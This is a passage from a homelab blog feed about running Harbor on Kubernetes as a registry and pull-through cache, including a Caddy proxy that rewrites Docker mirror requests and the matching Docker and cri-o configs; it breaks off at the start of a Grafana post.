<pre tabindex="0"><code>local alpine_ver = &#34;3.19.1&#34;;

local Pipeline(img_name, version, pr, alpine=false, alpine_ver_int=alpine_ver) = {
  kind: &#34;pipeline&#34;,
  name:
      if pr then
        &#34;Build &#34;+img_name
      else
        &#34;Release &#34;+img_name,
  platform: {
    arch: &#34;arm64&#34;,
  },
  steps: [
    {
      name:
      if pr then
        &#34;Build Image&#34;
      else
        &#34;Release Image&#34;,
      image: &#34;thegeeklab/drone-docker-buildx&#34;,
      privileged: true,
      settings: {
        repo: &#34;harbor.example.com/homelab/&#34;+img_name,
        registry: &#34;harbor.example.com&#34;,
        username: &#34;myuser&#34;,
        password: {
          from_secret: &#34;harbor-secret&#34;,
        },
        dockerfile: img_name+&#34;/Dockerfile&#34;,
        context: img_name+&#34;/&#34;,
        mirror: &#34;https://harbor-mirror.example.com&#34;,
        debug: true,
        buildkit_config: &#39;debug = true\n[registry.&#34;docker.io&#34;]\n  mirrors = [&#34;harbor.example/dockerhub-cache&#34;]\n[registry.&#34;quay.io&#34;]\n  mirrors = [&#34;harbor.example.com/quay.io-cache&#34;]\n[registry.&#34;ghcr.io&#34;]\n  mirrors = [&#34;harbor.example.com/github-cache&#34;]&#39;,
        tags: [version, &#34;latest&#34;],
        custom_dns: [&#34;10.0.0.1&#34;],
        build_args: std.prune([
          img_name+&#34;_ver=&#34;+version,
          if alpine then
            &#34;alpine_ver=&#34;+alpine_ver_int
        ]),
        platforms: [
          &#34;linux/amd64&#34;,
          &#34;linux/arm64&#34;,
        ],
        dry_run:
        if pr then
          true
        else
          false
      },
    }
  ],
  trigger:
    if pr then
    {
      event: {
        include: [
          &#34;pull_request&#34;
        ]
      }
    }
    else
    {
      branch: {
        include: [
          &#34;master&#34;
        ]
      },
      event: {
        exclude: [
          &#34;pull_request&#34;
        ]
      }
    }
};

local Image(img_name, version, alpine=false, alpine_ver_int=alpine_ver) = [
  Pipeline(img_name, version, true, alpine, alpine_ver_int),
  Pipeline(img_name, version, false, alpine, alpine_ver_int)
];

Image(&#34;gitea&#34;, &#34;1.21.10&#34;)
</code></pre><p>This configuration uses <a href="https://docs.docker.com/build/buildkit/">buildkit</a> via
the <a href="https://github.com/thegeeklab/drone-docker-buildx">drone-docker-buildx</a>
plugin, which is no longer actively developed. One of the reasons why I&rsquo;m
planning to migrate to Woodpecker.
I&rsquo;m creating images for both arm64 and amd64, as most of my Homelab consists
of Raspberry Pis.</p>
<p>One snag I hit during this part of the setup was when I tried to switch the
Fluentd image in my logging setup, already running on Kubernetes, over to
Harbor. I got only pull failures, without any indication what was going wrong.
It turned out that this was the first time my Kubernetes nodes were trying to
access something running in my cluster behind the Traefik ingress at
<code>example.com</code>. And I yet again had to adapt my NetworkPolicy for said Traefik
Ingress.
Looking at the Cilium monitoring, I saw the following whenever one of my k8s
hosts tried to pull the image:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
</code></pre><p>Here the endpoint with the <code>1868</code> identity is Traefik, and we can see that access
from a <code>remote-node</code> identity is failing. This was due to the fact that while I
allowed access from <code>world</code> to Traefik, <code>world</code> in Cilium only means all nodes
outside the Kubernetes cluster. Cluster nodes, including the local host, need
to be explicitly allowed. So I had to add the following to my Traefik NetworkPolicy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">cluster</span>
</span></span></code></pre></div><p><code>cluster</code> includes both, the local host and all other nodes in the cluster.</p>
<p>With that fixed, my homelab project was able to provide images to both, my
Docker based Nomad cluster and my cri-o based Kubernetes cluster:</p>
<figure>
    <img loading="lazy" src="homelab-project.png"
         alt="A screenshot of the repositories in the &#39;homelab&#39; project. It shows five repositories: hn-backup, fluentd, hugo, gitea and taskd. They have from 2 to 5 artifacts and 2 to 19 pulls. Overall, the quota used is 1.43 GiB. The access level is shown as &#39;Public&#39;"/> <figcaption>
            <p>My homelab project with five images after a couple of days of usage.</p>
        </figcaption>
</figure>

<h2 id="setting-harbor-up-as-a-pull-through-cache">Setting Harbor up as a pull-through cache</h2>
<p>With the handling of my own images finished and working, the last step remaining
is the setup of pull-through caches for some public image registries. I wanted
to set up an internal mirror for the following registries:</p>
<ul>
<li><a href="https://hub.docker.com/">DockerHub</a></li>
<li><a href="https://quay.io">quay.io</a></li>
<li><a href="ghcr.io">GitHub Container Registry</a></li>
<li><a href="https://registry.k8s.io">The official k8s registry</a></li>
</ul>
<p>In Harbor, each mirror needs to be set up as a separate project, and it needs to
be accessed at &ldquo;harbor.example.com/project-name&rdquo;. This is an issue for Docker
daemons, which I will go into detail about later.</p>
<p>Here is an example for setting up the <code>quay.io</code> cache. First, an endpoint needs
to be defined:</p>
<figure>
    <img loading="lazy" src="new-mirror.png"
         alt="A screenshot of the &#39;New Registry Endpoint&#39; dialogue in Harbor. In the menu on the left, the entry &#39;Registries&#39; is chosen, and then the button &#39;NEW ENDPOINT&#39; was clicked. The dialogue itself has the &#39;Provider&#39; dropdown filled with &#39;Quay&#39;. The name is given as &#39;Quay.io Cache&#39; and the &#39;Endpoint URL&#39; as &#39;https://quay.io&#39;."/> <figcaption>
            <p>Setting up an endpoint for quay.io</p>
        </figcaption>
</figure>

<p>After the endpoint is defined, the project needs to be created:</p>
<figure>
    <img loading="lazy" src="new-mirror-project.png"
         alt="A screenshot of the &#39;New Project&#39; dialogue in Harbor. In the menu on the left, the entry &#39;Projects&#39; is chosen, and then the button &#39;NEW PROJECT was clicked. In the dialogue, the project-name is &#39;quay-cache&#39;, with the &#39;Access Level&#39; checkbox labeled &#39;Public&#39; being checked. The project quota is left at the default &#39;-1&#39;. The &#39;Proxy Cache&#39; toggle is enabled, and the previously shown &#39;Quay.io cache&#39; is chosen in the dropdown."/> <figcaption>
            <p>Setting up an the mirror project for quay.io</p>
        </figcaption>
</figure>

<p>After these steps are done, a mirror for <a href="https://quay.io">quay.io</a> will be
available at <code>https://harbor.example.com/quay-cache</code>.</p>
<p>Here is a table of the configs for my current mirrors:</p>
<table>
  <thead>
      <tr>
          <th>Name</th>
          <th>Endpoint URL</th>
          <th>Provider</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>dockerhub-cache</td>
          <td><a href="https://hub.docker.com">https://hub.docker.com</a></td>
          <td>Docker Hub</td>
      </tr>
      <tr>
          <td>github-cache</td>
          <td><a href="https://ghcr.io">https://ghcr.io</a></td>
          <td>Github GHCR</td>
      </tr>
      <tr>
          <td>k8s-cache</td>
          <td><a href="https://registry.k8s.io">https://registry.k8s.io</a></td>
          <td>Docker Registry</td>
      </tr>
      <tr>
          <td>quay.io-cache</td>
          <td><a href="https://quay.io">https://quay.io</a></td>
          <td>Quay</td>
      </tr>
  </tbody>
</table>
<p>But there is an issue with Harbor&rsquo;s subpath approach to projects/mirrors:
Docker only supports the <a href="https://docs.docker.com/docker-hub/mirror/#configure-the-docker-daemon">registry-mirror</a>
option. This will only be used for DockerHub images, not any other registry.
And the main issue: It does not support paths in the mirror URL given. Docker
always expects the registry at <code>/</code>. This obviously doesn&rsquo;t work with Harbor&rsquo;s
<code>domain/projectName/</code> scheme.</p>
<p>At the same time, cri-o does not suffer from this issue at all. It follows the
<a href="https://github.com/containers/image/blob/main/docs/containers-registries.conf.5.md">OCI containers-registries spec</a>.
With this spec, and the <code>containers-registries.conf</code> file, it can be configured
to rewrite pulls to any registry URL you like.
I will explain this later, but let&rsquo;s start with the more complicated Docker
daemon case.</p>
<h3 id="what-does-docker-actually-do-when-pulling">What does Docker actually do when pulling?</h3>
<p>While trying to figure out how to solve the issue with Docker&rsquo;s <code>registry-mirror</code>
option, I found <a href="https://smile.eu/en/publications-and-events/how-configure-docker-hub-proxy-harbor">this blog post</a>,
which had an excellent idea: Just rewrite Docker&rsquo;s requests to point them to the
right Harbor URL. And it worked. &#x1f642;</p>
<p>Let&rsquo;s start by having a look at the HTTP requests Docker makes when issuing the
following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>docker pull postgres:10
</span></span></code></pre></div><p>As the command does not have a registry domain defined, Docker defaults to
DockerHub.
Let&rsquo;s imagine the Docker daemon is configured with <code>--registry-mirror https://harbor.example.com</code>.</p>
<p>The first request Docker would try to make is this:</p>
<pre tabindex="0"><code>GET https://harbor.example.com/v2/
</code></pre><p>It would expect a 401 return code, and a <code>www-authenticate</code> header.
This header looks something like this in the case of harbor:</p>
<pre tabindex="0"><code>www-authenticate: Bearer realm=&#34;https://harbor.example.com/service/token&#34;,service=&#34;harbor-registry&#34;
</code></pre><p>Next, Docker tries to request a token:</p>
<pre tabindex="0"><code>https://harbor.example.com/service/token?scope=repository:library/postgres/pull&amp;service=harbor-registry
</code></pre><p>Armed with that token, it would look for the manifest file for the posgres:10
image:</p>
<pre tabindex="0"><code>https://harbor.example.com/v2/library/postgres/manifests/10.0
</code></pre><p>This is where things start going wrong with harbor, because this request, send
to harbor, would look for the <code>library</code> project, which does exist by default,
but is not a DockerHub mirror.</p>
<p>My first attempt to solve this issue was pretty simplistic: I configured an
additional route for the <code>harbor-core</code> service in my Traefik ingress, with an
additional path rewrite to rewrite requests like <code>/v2/library/postgres/manifests/10.0</code>
to <code>/v2/dockerhub-cache/library/postgres/manifests/10.0</code>. It looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-docker-mirror</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress-k8s.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`harbor-mirror.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">project-rewrite</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-core</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">project-rewrite</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replacePathRegex</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">^\/v2\/(.+)$</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">/v2/dockerhub-cache/${1}</span>
</span></span></code></pre></div><p>This worked somewhat. The initial request for <code>/v2/</code> was rewritten. But then
I did not see the <code>/service/token</code> request hit this new <code>harbor-mirror</code> domain
at all. It went to the <code>harbor</code> domain instead. And that request worked successfully,
Docker got a token from that endpoint.
But: The request would have been for a token to access the <code>/library/postgres</code>
repository.
The next request then went through the <code>harbor-mirror</code> again, which meant the
request was correctly rewritten:</p>
<pre tabindex="0"><code>/v2/dockerhub-cache/library/postgres/manifests/10.0
</code></pre><p>But Harbor would now return a 401, because the token fetched in the previous
step was for <code>/library/postgres/</code>, while the request was now for <code>/dockerhub-cache/library/postgres</code>.</p>
<p>To fix this issue, I did not just need to rewrite the query parameter for the
<code>/service/token</code> request, but also the one before that. Because the domain to
contact for the <code>/service/token</code> request is taken from the <code>www-authenticate</code>
header of the response from the initial <code>/v2/</code> request. And Harbor would of
course always answer with a fixed domain, the one from the <code>externalURL</code>
parameter in the Helm chart. And that&rsquo;s not the route with the rewrite.</p>
<p>So I had to do two additional things, in addition to rewriting paths accessing
<code>/v2/</code>:</p>
<ol>
<li>Rewrite the <code>www-authenticate</code> header from the response to the initial
<code>/v2/</code> request to make the Realm point to the special mirror domain, not
Harbor&rsquo;s domain</li>
<li>Rewrite the <code>scope=repository:</code> in the <code>/service/token</code> request to prefix it
with the name of the DockerHub mirror project in Harbor</li>
</ol>
<p>It turned out that Traefik wasn&rsquo;t really well equipped for that. It can of course
rewrite headers, but there&rsquo;s no facility to work with regexes - I could only
replace the entire <code>www-authenticate</code> header with a static value. And that seemed a bit too inflexible
to me.</p>
<p>So instead, I decided to set up another Pod, running the <a href="https://github.com/caddyserver/caddy">Caddy webserver</a>,
and using it to do the rewrites. I decided to use Caddy instead of Nginx, as the
blog post I linked above did, because I&rsquo;ve already got another Caddy serving
as a webserver for my Nextcloud setup, but currently don&rsquo;t have any Nginx in my
Homelab.</p>
<p>I kept the Caddy setup pretty simple. Here&rsquo;s the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-dockerhub-mirror</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:2.7.6</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy/</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror-conf</span>
</span></span></code></pre></div><p>Then there&rsquo;s also a service required:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>And finally an IngressRoute for my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-docker-mirror</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress-k8s.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`harbor-mirror.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>The really interesting part is the Caddy config:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: ConfigMap
metadata:
  name: caddy-mirror-conf
data:
  Caddyfile: |
    {
      admin off
      auto_https off
      log {
        output stdout
        level INFO
      }
    }
    :8080 {
      log {
        output stdout
        format filter {
          wrap json
          fields {
            request&gt;headers&gt;Authorization delete
            request&gt;headers&gt;Cookie delete
          }
        }
      }
      @v2-subpath {
        path_regexp repo ^/v2/(.+)
      }

      map /service/token {query.scope} {new_scope} {
        ~(repository:)(.*) &#34;${1}dockerhub-cache/${2}&#34;
      }

      rewrite /service/token ?scope={new_scope}&amp;service={query.service}

      header &gt;Www-Authenticate harbor.example.com harbor-mirror.example.com

      rewrite @v2-subpath /v2/dockerhub-cache/{re.repo.1}

      reverse_proxy http://harbor-core.namespace-of-harbor.svc.cluster.local {
        header_up Host &#34;harbor.example.com&#34;
      }
    }
</code></pre><p>The first rewrite is for all requests which go to <code>/v2/</code>. Because I don&rsquo;t want
to append the <code>dockerhub-cache/</code> to the URL for the initial Docker daemon request
for <code>/v2/</code>, I went with the <code>^/v2/(.+)</code> regex for the matcher:</p>
<pre tabindex="0"><code>@v2-subpath {
  path_regexp repo ^/v2/(.+)
}

rewrite @v2-subpath /v2/dockerhub-cache/{re.repo.1}
</code></pre><p>These two lines define a rewrite for all paths <code>/v2/.+</code> to <code>/v2/dockerhub-cache/...</code>,
so that any request going over this mirror automatically accesses the DockerHub
mirror project on my Harbor instance.</p>
<p>The next line just replaces the canonical Harbor domain with the specific mirror
domain in the <code>www-authenticate</code> header, so that the subsequent request for the
token goes through the mirror as well, instead of directly going to Harbor:</p>
<pre tabindex="0"><code>header &gt;Www-Authenticate harbor.example.com harbor-mirror.example.com
</code></pre><p>With this, the <code>realm=&quot;https://harbor.example.com/service/token&quot;</code> part of the
header is rewritten to <code>realm=&quot;https://harbor-mirror.example.com/service/token&quot;</code>.</p>
<p>Now, the request for the token also goes through the Caddy instance, and I can
rewrite the repository in the request&rsquo;s <code>scope</code> parameter:</p>
<pre tabindex="0"><code>map /service/token {query.scope} {new_scope} {
  ~(repository:)(.*) &#34;${1}dockerhub-cache/${2}&#34;
}
rewrite /service/token ?scope={new_scope}&amp;service={query.service}
</code></pre><p>The <code>map</code> instruction matches only on requests to <code>/service/token</code> and maps only
the <code>scope</code> query parameter, to a Caddy-internal variable <code>new_scope</code>, where
I split the <code>scope=repository:library/postgres:pull</code> parameter, graft the
necessary <code>/dockerhub-cache/</code> prefix in front of the <code>/library/postgres</code> repository
definition. With this, the token request is made for the correct repository and
Harbor will accept requests for the image files accompanied by this token.</p>
<p>One note: I had also tried to rewrite the entire query part of the request in
one go, but I hit a weird issue. When operating on the whole query as one,
Caddy would urlencode more parts of the query, in particular the <code>=</code> sign in the
<code>scope</code> and <code>service</code> parameters. And for some reason, Harbor did not like that.
It would only spit out a token when the <code>=</code> signs were left as-is.</p>
<p>And with all of this combined, I could now set the <code>registry-mirror</code> option for
my Docker agents to <code>https://harbor-mirror.example.com</code>, and Docker pulls worked
as intended and used the dockerhub-cache mirror on my Harbor instance without
issue. &#x1f389;</p>
<h2 id="configuring-docker-and-cri-o">Configuring Docker and cri-o</h2>
<p>Onto the last step: Configuring the Docker daemons in my Nomad cluster and the
cri-o daemons in my Kubernetes cluster to use the new Harbor mirrors.</p>
<p>As noted above, Docker only supports mirrors for the DockerHub, nothing else.
So configuring those daemons is pretty simple, just adding this in the
<code>/etc/docker/daemon.json</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;registry-mirrors&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;https://harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Luckily, <code>registry-mirrors</code> is one of the Docker config options which can be live-reloaded,
so a <code>pkill --signal SIGHUP dockerd</code> is enough, no restarts of the daemon and
running containers necessary.</p>
<p>The cri-o config is a bit more involved, but it does have the benefit of supporting
mirrors for any external registry you like.
Cri-o implements the <a href="https://github.com/containers/image/blob/main/docs/containers-registries.conf.5.md">containers-registries</a>
config files. These can also be reloaded by sending a <code>pkill --signal SIGHUP crio</code>
to the daemon, without any restarts.</p>
<p>The mirror configs all have a similar format. As an example, the config for
<code>registry.k8s.io</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-toml" data-lang="toml"><span style="display:flex;"><span>[[<span style="color:#a6e22e">registry</span>]]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">prefix</span> = <span style="color:#e6db74">&#34;registry.k8s.io&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">insecure</span> = <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">blocked</span> = <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">location</span> = <span style="color:#e6db74">&#34;registry.k8s.io&#34;</span>
</span></span><span style="display:flex;"><span>[[<span style="color:#a6e22e">registry</span>.<span style="color:#a6e22e">mirror</span>]]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">location</span> = <span style="color:#e6db74">&#34;harbor.example.com/k8s-cache&#34;</span>
</span></span></code></pre></div><p>I place that file into <code>/etc/containers/registries.conf.d/k8s-mirror.conf</code>,
issue a SIGHUP, and cri-o will happily start pulling from the Harbor mirror
whenever an image from the official k8s registry is required. And like Docker,
it will pull from the original registry if the mirror is down.</p>
<p>And with that, I&rsquo;ve got my container registry needs migrated fully to Kubernetes
with Harbor. Especially the piece with the request rewrites to get a DockerHub
mirror for Docker daemons going on Harbor was interesting to figure out and very
satisfying to get working.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 10: Grafana</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-10-grafana/</link>
      <pubDate>Sat, 06 Apr 2024 21:10:25 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-10-grafana/</guid>
      <description>Running Grafana with the kube-prometheus-stack chart</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Grafana instance over to k8s.</p>
<p>This is part 11 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I already wrote about my love for metrics in the companion post about the
<a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">Prometheus setup</a>, so I will
spare you my excitement about pretty graphs this time. &#x1f609;</p>
<p>For the Grafana setup, I used the <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack&rsquo;s</a>
integration of the <a href="https://github.com/grafana/helm-charts/tree/main/charts/grafana">Grafana Helm Chart</a>.</p>
<h2 id="database-setup">Database setup</h2>
